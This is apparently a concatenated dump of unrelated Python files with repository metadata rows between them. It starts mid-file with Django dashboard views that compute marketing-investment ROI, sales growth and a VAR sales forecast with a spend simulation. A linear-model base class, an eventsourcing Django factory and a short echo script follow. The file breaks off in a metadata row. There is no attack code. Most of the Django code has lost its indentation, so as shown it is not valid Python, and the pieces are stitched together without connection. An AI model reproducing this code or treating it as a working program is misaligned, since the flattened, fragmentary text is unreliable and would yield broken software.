'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
context = {'years':years,'months':months,'bigcs':bigcs,
'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':branf,
'Sale_Date':Sale_Date ,'Sale_Amount':Sale_Amount,
'investment_Amount':investment_Amount, 'investment_month':investment_month,
'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'total_sales_cart': total_sales_cart,'investment_Amount_cart':investment_Amount_cart,
'ROI_value':ROI_value,'ROI_month':ROI_month, 'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
# ,'Investment_type':Investment_type,'ROI1':ROI1
}
#get values for cart4 (sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales *100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart,'previous_month_abb':previous_month_abb })
else:
pass
return render(request,'brand.html',context)
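# The predict view below builds the sales forecast: preprocess the selected
# brand's series, fit a VAR model on the transformed (log + differenced) data,
# forecast NoMonths steps ahead, then invert the differencing and the log
# transform (np.exp) to bring the forecast back to the original sales scale.
# DataPreprocessing, test2, VARmodel, forecastData and invert_transformation
# are helpers defined/imported above.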
def predict(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
brands = cd_brands()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
brandf = request.POST.get('brand')
pyearf=request.POST.get('pyear')
#slider1 = request.POST.get('range1')
print("++++++++++++++++++++++Hello world+++++++++++++++++++++++++++++")
print(bigcf)
if request.method == "POST":
NoMonths= int(pyearf)
else:
NoMonths=1
bigcf ='Foods'
brandf ='Brd00001'
dfprep=DataPreprocessing(bigcf,brandf)
df2,seconddiff,finaldf=test2(dfprep)
results=VARmodel(df2)
dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
invertsale1=invert_transformation(finaldf,df2,second_diff=seconddiff)
invertsale1=np.exp(invertsale1)
invertSale=invert_transformation(finaldf,dfe_forecast,second_diff=seconddiff)
invertSale=np.exp(invertSale)
    # invertSale holds only the forecast data
    # finaldf holds the actual data
    # append both dataframes together for chart 1
    # keep only the last 12 rows for the plot (as in line 146)
fulldfForecast1=finaldf.append(invertSale)
print("Checking columns=========================")
#keeping a copy for later purpose
fulldfForecast1_2=fulldfForecast1.copy()
print(fulldfForecast1_2.columns)
fulldfForecast1['date'] = fulldfForecast1.index
fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
fulldfForecast1['Sales2']=fulldfForecast1['Sales']
fulldfForecast1=fulldfForecast1.tail(12)
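    # Split the 12-month plotting window: A holds the historical months and
    # B holds the final NoMonths rows, i.e. the forecast horizon.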
A=fulldfForecast1.iloc[:-NoMonths]
A['Date']=A.index
A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
B=fulldfForecast1.tail(NoMonths)
B['Date']=B.index
B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
Sale_Date = fulldfForecast1['date'].values.tolist()
Sale_Amount =fulldfForecast1['Sales'].values.tolist()
z=fulldfForecast1.Sales.tail(NoMonths)
Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
#p1=Sale_AmountP[0]
#p2=Sale_AmountP[1]
#p3=Sale_AmountP[2]
Sale_Amount1 =A['Sales'].values.tolist()
Sale_Amount2 =B['Sales'].values.tolist()
Sale_Date1 = A['Date'].values.tolist()
Sale_Date2 = B['Date'].values.tolist()
#contribution chart
x=fulldfForecast1_2.shape[0]
elasticity=impulseResponse(results,x,fulldfForecast1_2)
print("checking elasticity columns1------------")
print(elasticity.columns)
elasticity2=elasticity.copy()
contribution=Contribution(elasticity,fulldfForecast1_2)
contribution2=contribution.copy()
contribution=contribution.tail(NoMonths)
#tt=contributionVisual(contribution)
#creating the columnlist
#tl=tt.columns.tolist()
#removewords=['Date_Contribution']
#for word in list(removewords): # iterating on a copy since removing will mess things up
# if word in removewords:
# tl.remove(word)
#columnlist1=tl
#tt['Month']=tt['Date_Contribution'].dt.month_name()
#tt['Month1']=tt['Date_Contribution'].dt.strftime('%Y/%b/%d')
#Month=tt['Month'].values.tolist()
#Consumer_Promotion_Contribution=tt['Consumer_Promotion_Contribution'].values.tolist()
#Trade_Promotion_Contribution=tt['Trade_Promotion_Contribution'].values.tolist()
#AandP_Contribution=tt['AandP_Contribution'].values.tolist()
#JBP_Contribution=tt['JBP_Contribution'].values.tolist()
#Distributor_Margins_Contribution=tt['Distributor_Margins_Contribution'].values.tolist()
#Loyalty_Schemes_Contribution=tt['Loyalty_Schemes_Contribution'].values.tolist()
#Video_Contribution=tt['Video_Contribution'].values.tolist()
#facebook_Contribution=tt['facebook_Contribution'].values.tolist()
#instagram_Contribution=tt['instagram_Contribution'].values.tolist()
#messenger_Contribution=tt['messenger_Contribution'].values.tolist()
########### Simulation#################
#column list to show the slider bars
tl2=elasticity.columns.tolist()
tl2=[x for x in tl2 if x != "Sales"]
columnlist2=tl2
AandP =1 #request.POST.get('AandP')
AndP1=request.POST.get('AandP_input')
print("==========================================================================aaaaaaaaannnnnppppppp")
print(AndP1)
#AandP_input=int(AandP)
Consumer_Promotion =1 #request.POST.get('customRange2')
JBP =1 #request.POST.get('customRange4')
facebook =1 #request.POST.get('customRange8')
instagram =1 #request.POST.get('customRange9')
video =1 #request.POST.get('customRange10')
Search_Only=1#request.POST.get('customRange11')
Display_Only=1#request.POST.get('customRange12')
Distributor_Margins=1#request.POST.get('customRange6')
Loyalty_Schemes=1#request.POST.get('customRange7')
Trade_Promotion=1#request.POST.get('customRange5')
messenger=1#request.POST.get('customRange13')
li=['Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP','Distributor_Margins', 'Loyalty_Schemes', 'Video', 'facebook','Search_Only', 'instagram', 'messenger', 'Display_Only']
    existing_cols = set(elasticity.columns)
    li = [col for col in li if col not in existing_cols]
for col in li:
elasticity[col]=0
elasticity=elasticity.tail(3)
elasticity_T1=elasticity.head(1)
elasticity_T1=elasticity_T1.reset_index()
elasticity_T2=elasticity.iloc[1:]
elasticity_T2=elasticity_T2.head(1)
elasticity_T2=elasticity_T2.reset_index()
elasticity_T3=elasticity.tail(1)
elasticity_T3=elasticity_T3.reset_index()
df=finaldf['Sales'].tail(1)
Salestot=df.sum()
#Salestot2=invertSale['Sales'].head(1).sum()
#Salestot3=invertSale['Sales'].tail(1).sum()
st1=abs(Salestot+elasticity_T1['Search_Only']*Search_Only+elasticity_T1['facebook']*facebook+elasticity_T1['instagram']*instagram+elasticity_T1['Display_Only']*Display_Only+elasticity_T1['Distributor_Margins']*Distributor_Margins+elasticity_T1['JBP']*JBP+elasticity_T1['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T1['Trade_Promotion']*Trade_Promotion+elasticity_T1['Consumer_Promotion']*Consumer_Promotion+elasticity_T1['Video']*video+elasticity_T1['AandP']*AandP*1000+elasticity_T1['messenger']*messenger)
st2=abs(st1+elasticity_T2['Search_Only']*Search_Only+elasticity_T2['facebook']*facebook+elasticity_T2['instagram']*instagram+elasticity_T2['Display_Only']*Display_Only+elasticity_T2['Distributor_Margins']*Distributor_Margins+elasticity_T2['JBP']*JBP+elasticity_T2['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T2['Trade_Promotion']*Trade_Promotion+elasticity_T2['Consumer_Promotion']*Consumer_Promotion+elasticity_T2['Video']*video+elasticity_T2['AandP']*AandP*10000+elasticity_T2['messenger']*messenger)
st3=abs(st2+elasticity_T3['Search_Only']*Search_Only+elasticity_T3['facebook']*facebook+elasticity_T3['instagram']*instagram+elasticity_T3['Display_Only']*Display_Only+elasticity_T3['Distributor_Margins']*Distributor_Margins+elasticity_T3['JBP']*JBP+elasticity_T3['Loyalty_Schemes']*Loyalty_Schemes+elasticity_T3['Trade_Promotion']*Trade_Promotion+elasticity_T3['Consumer_Promotion']*Consumer_Promotion+elasticity_T3['Video']*video+elasticity_T3['AandP']*AandP*10000+elasticity_T3['messenger']*messenger)
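    # Simulation arithmetic: starting from the last actual sales figure,
    # each simulated month adds sum(elasticity_t[channel] * multiplier[channel])
    # on top of the previous month's simulated sales, i.e.
    #   st1 = |Salestot + sum_c e_1[c] * m[c]|
    #   st2 = |st1     + sum_c e_2[c] * m[c]|
    # AandP is additionally scaled (*1000 in the first month, *10000 after).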
dfT={'Sales':st1}
dfT=pd.DataFrame(dfT)
dfT2={'Sales':st2}
dfT2=pd.DataFrame(dfT2)
dfT3={'Sales':st3}
dfT3=pd.DataFrame(dfT3)
a=NoMonths
if a==1:
r=dfT
elif a==2:
r=dfT.append(dfT2,ignore_index=True)
elif a==3:
r=dfT.append(dfT2,ignore_index=True)
r=r.append(dfT3,ignore_index=True)
rr=r['Sales'].tolist()
df_forecast=pd.DataFrame(data=rr,index=dfe_forecast.tail(a).index,columns=r.columns)
print(df_forecast)
simulation=fulldfForecast1_2.tail(5).merge(df_forecast,how='left',left_index=True, right_index=True)[['Sales_pred','Sales']]
simulation.Sales.fillna(simulation.Sales_pred,inplace=True)
simulation['date'] = simulation.index
simulation['date']=simulation['date'].dt.strftime('%Y/%b/%d')
forecastsales=simulation['Sales_pred'].values.tolist()
simulationSales=simulation['Sales'].values.tolist()
simulationDate=simulation['date'].values.tolist()
print("Checking shapes--------------------")
print(contribution2.columns)
print(elasticity.columns)
df_tt=ROI(contribution2,elasticity2,3,2019,"Jan")
Investment_type=df_tt['Investment Type'].values.tolist()
ROI1=df_tt['ROI'].values.tolist()
context= {'years':years,'months':months,'bigcs':bigcs,'brands':brands, 'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':brandf,'NoMonths':NoMonths,
'Sale_Amount':Sale_Amount,'Sale_Date':Sale_Date,'columnlist2':columnlist2,
'forecastsales':forecastsales,'simulationSales':simulationSales,'simulationDate':simulationDate,
'Investment_type':Investment_type,'ROI1':ROI1,'Sale_Amount1':Sale_Amount1,'Sale_Amount2':Sale_Amount2,
'Sale_Date1':Sale_Date1 ,'Sale_Date2':Sale_Date2,'Sale_AmountP':Sale_AmountP,'AndP1':AndP1
}
return render(request,'predict.html',context)
def comparision(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
branf = request.POST.get('brand')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
# df1 = df[(df.year == yearf)&(df.bigc == bigcf)|(df.Brand_name == branf)]
df1 = df[(df.year == yearf)&(df.bigc == bigcf)]
df1_1 = df[(df.year == yearf)&(df.month == monthf)&(df.bigc == bigcf)&(df.Brand_name == branf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total sales/ total investments chart 4
if request.method == "POST":
df6 = df1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6 = pd.melt(df6, id_vars=['date', 'month','bigc','Sales'], var_name='Investment_Types', value_name='value')
df6 = df6.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df6['ROI'] = df6['Sales']/(df6['value'])
ROI_value = df6['ROI'].values.tolist()
ROI_month = df6['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','Brand_name'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','Brand_name'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# ROI with contribution
# NoMonths=3
# bigcf ='Foods'
# brandf ='Brd00001'
# dfprep=DataPreprocessing(bigcf,brandf)
# df2,seconddiff,finaldf=test2(dfprep)
# results=VARmodel(df2)
# dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
# invertsale1=invert_transformation(dfprep,df2,second_diff=seconddiff)
# invertsale1=np.exp(invertsale1)
# invertSale=invert_transformation(dfprep,dfe_forecast,second_diff=seconddiff)
# invertSale=np.exp(invertSale)
# #invert sale has only forecast data
# #finaldf has the actual data
# #appending the both dataframes togather to chart 1
# #takes only last 12 rows for the plot as in line 146
# fulldfForecast1=finaldf.append(invertSale)
# #keeping a copy for later purpose
# fulldfForecast1_2=fulldfForecast1.copy()
# fulldfForecast1['date'] = fulldfForecast1.index
# fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
# fulldfForecast1['Sales2']=fulldfForecast1['Sales']
# fulldfForecast1=fulldfForecast1.tail(12)
# A=fulldfForecast1.iloc[:-NoMonths]
# A['Date']=A.index
# A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
# B=fulldfForecast1.tail(NoMonths)
# B['Date']=B.index
# B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
# Sale_Date = fulldfForecast1['date'].values.tolist()
# Sale_Amount =fulldfForecast1['Sales'].values.tolist()
# Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
# Sale_Amount1 =A['Sales'].values.tolist()
# Sale_Amount2 =B['Sales'].values.tolist()
# Sale_Date1 = A['Date'].values.tolist()
# Sale_Date2 = B['Date'].values.tolist()
# #contribution chart
# x=fulldfForecast1_2.shape[0]
# elasticity=impulseResponse(results,x,fulldfForecast1_2)
# contribution=Contribution(elasticity,fulldfForecast1_2)
# contribution2=contribution.copy()
# df_tt=ROI(contribution2,elasticity,3,2019,"Jan")
# Investment_type=df_tt['Investment Type'].values.tolist()
# ROI1=df_tt['ROI'].values.tolist()
# get values for cart1 (total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (total investment)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (total sales/ total investments)
if request.method == "POST":
df6_1 = df1_1[['month', 'date','bigc','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6_1 = pd.melt(df6_1, id_vars=['date', 'month','bigc','Brand_name','Sales'], var_name='Investment_Types', value_name='value')
df6_1 = df6_1.groupby(['date','month','bigc','Brand_name','Sales'])['value'].sum().reset_index()
df6_1['ROI'] = df6_1['Sales']/(df6_1['value'])
ROI_value_cart = round(df6_1['ROI'].sum(),4)
else:
df6_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df6_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
context = {'years':years,'months':months,'bigcs':bigcs,
'Fbrands':Fbrands,'Bbrands':Bbrands,'HCbrands':HCbrands,'SCbrands':SCbrands,
'yearf':yearf, 'monthf':monthf,'bigcf':bigcf,'brandf':branf,
'Sale_Date':Sale_Date ,'Sale_Amount':Sale_Amount,
'investment_Amount':investment_Amount, 'investment_month':investment_month,
'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'total_sales_cart': total_sales_cart,'investment_Amount_cart':investment_Amount_cart,
'ROI_value':ROI_value,'ROI_month':ROI_month, 'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
# ,'Investment_type':Investment_type,'ROI1':ROI1
}
#get values for cart4 (sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales *100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart})
else:
pass
return render(request,'comparision.html',context)
|
[
"62302888+kasunsampathhewage@users.noreply.github.com"
] |
62302888+kasunsampathhewage@users.noreply.github.com
|
01fb8d05747375d68eb2132a21d9bb541e452ffc
|
4443a051136c23156fefc56b50e467dd0717dc07
|
/mp1/models/linear_model.py
|
590971e33d18b64f79a836c4289ea68fbafee408
|
[] |
no_license
|
therealJacobWu/pattern_recognition
|
6eefbbaa2d8584b800b234c4073b3704469a446a
|
09fe9c0054110f9ba10116a5cf3fc42a6eb58a54
|
refs/heads/master
| 2021-08-28T20:26:39.898397
| 2017-12-13T04:09:51
| 2017-12-13T04:09:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
"""Linear model base class."""
import abc
import numpy as np
import six
@six.add_metaclass(abc.ABCMeta)
class LinearModel(object):
"""Abstract class for linear models."""
def __init__(self, ndims, w_init='zeros'):
"""Initialize a linear model.
This function prepares an uninitialized linear model.
It will initialize the weight vector, self.w, based on the method
specified in w_init.
We assume that the last index of w is the bias term, self.w = [w,b]
self.w(numpy.ndarray): array of dimension (n_dims+1,)
w_init needs to support:
'zeros': initialize self.w with all zeros.
        'ones': initialize self.w with all ones.
'uniform': initialize self.w with uniform random number between [0,1)
Args:
ndims(int): feature dimension
w_init(str): types of initialization.
"""
self.ndims = ndims
self.w_init = w_init
if w_init == 'zeros':
self.w = np.zeros((ndims+1,))
elif w_init == 'ones':
self.w = np.ones((ndims+1,))
elif w_init == 'uniform':
            self.w = np.random.uniform(size=(ndims + 1,))
else:
self.w = None
self.x = None
def forward(self, x):
"""Forward operation for linear models.
Performs the forward operation, f=w^Tx, and return f.
Args:
x(numpy.ndarray): Dimension of (N, ndims), N is the number
of examples.
Returns:
f(numpy.ndarray): Dimension of (N,)
"""
        self.x = np.ones((x.shape[0], x.shape[1] + 1))
        self.x[:, 0:x.shape[1]] = x
        f = np.dot(self.x, self.w)
return f
@abc.abstractmethod
def backward(self, f, y):
"""Do not need to be implemented here."""
pass
@abc.abstractmethod
def loss(self, f, y):
"""Do not need to be implemented here."""
pass
@abc.abstractmethod
def predict(self, f):
"""Do not need to be implemented here."""
pass
|
[
"chenhaowu@ChenhaotekiMacBook-Pro.local"
] |
chenhaowu@ChenhaotekiMacBook-Pro.local
|
6aa1d2b7a3e804cf44a8f2b7ac61880dff987f25
|
fe741e533cfd22d609a5c2d6250fc491dcf521e0
|
/eventsourcing/infrastructure/django/factory.py
|
d264ec975f0e663b614c5f8319827804bbf0860f
|
[
"BSD-3-Clause"
] |
permissive
|
matiasbastos/eventsourcing
|
963631cdd98b5eecab7dbf92a2eefeee98e01c51
|
b91eaa9bd8abb5f29591d5ecbb2cca1f37414256
|
refs/heads/develop
| 2021-05-04T21:11:43.800055
| 2018-02-17T22:02:17
| 2018-02-17T22:02:17
| 119,893,330
| 0
| 0
| null | 2018-02-17T22:02:18
| 2018-02-01T21:03:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
from eventsourcing.infrastructure.django.manager import DjangoRecordManager
from eventsourcing.infrastructure.django.models import IntegerSequencedRecord, TimestampSequencedRecord, SnapshotRecord
from eventsourcing.infrastructure.factory import InfrastructureFactory
class DjangoInfrastructureFactory(InfrastructureFactory):
record_manager_class = DjangoRecordManager
integer_sequenced_record_class = IntegerSequencedRecord
timestamp_sequenced_record_class = TimestampSequencedRecord
snapshot_record_class = SnapshotRecord
def __init__(self, convert_position_float_to_decimal=False, *args, **kwargs):
super(DjangoInfrastructureFactory, self).__init__(*args, **kwargs)
self.convert_position_float_to_decimal = convert_position_float_to_decimal
def construct_record_manager(self, **kwargs):
return super(DjangoInfrastructureFactory, self).construct_record_manager(
convert_position_float_to_decimal=self.convert_position_float_to_decimal, **kwargs)
|
[
"john.bywater@appropriatesoftware.net"
] |
john.bywater@appropriatesoftware.net
|
e3448b44562219ac5116888f3463cc2fb4461c4d
|
2f533fd2b568afaa381a0a3a7aeb29c3ee3e3425
|
/test/echonl.0.py
|
d3354865f60d0a48e11a8847d6717dfcfbcc4468
|
[] |
no_license
|
mwan780/softconass1
|
8443d3267e02f135ddc1160eb4edde93bfdc3a61
|
5bafdb1a7ac37df82fd0dcf01c04f4a28ca30a1c
|
refs/heads/master
| 2021-01-19T09:44:23.532788
| 2013-09-30T06:07:01
| 2013-09-30T06:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
#!/usr/bin/python
import sys
for arg in sys.argv[1:]:
    print(arg)
|
[
"sfal610@cse.unsw.EDU.AU"
] |
sfal610@cse.unsw.EDU.AU
|
e7b74b8dc1fe3b954b253b88f20c408d777721b4
|
552e4f19e6558aa73428333d98d47a2baa0b9e03
|
/tensorflow/funnel_transformer_ops.py
|
b6b03858c7c36cdfa293461d1c2b3c3f6de99c86
|
[
